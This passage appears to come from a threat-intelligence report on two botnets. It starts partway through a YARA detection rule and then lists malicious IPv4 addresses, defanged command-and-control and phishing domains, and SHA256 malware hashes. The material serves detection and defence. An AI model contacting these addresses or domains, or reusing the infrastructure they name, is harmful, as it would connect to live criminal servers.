$domain7 = "ora-0-web.com" nocase
$domain8 = "adesso-online.com" nocase
$domain9 = "multi-canale.com" nocase
$domain10 = "eversioneweb.com" nocase
$domain11 = "gestisciweb.com" nocase
condition:
any of them or
hash.sha256(0, filesize) == "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b" or
hash.sha256(0, filesize) == "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0" or
hash.sha256(0, filesize) == "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0" or
hash.sha256(0, filesize) == "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6" or
hash.sha256(0, filesize) == "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc" or
hash.sha256(0, filesize) == "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
}
Malicious IPv4 addresses (botnet #1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Malicious domains (botnet #1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Malicious IPv4 addresses (botnet #2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Malicious domains (botnet #2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
SHA256 hashes (botnet #1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
SHA256 hashes (botnet #2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549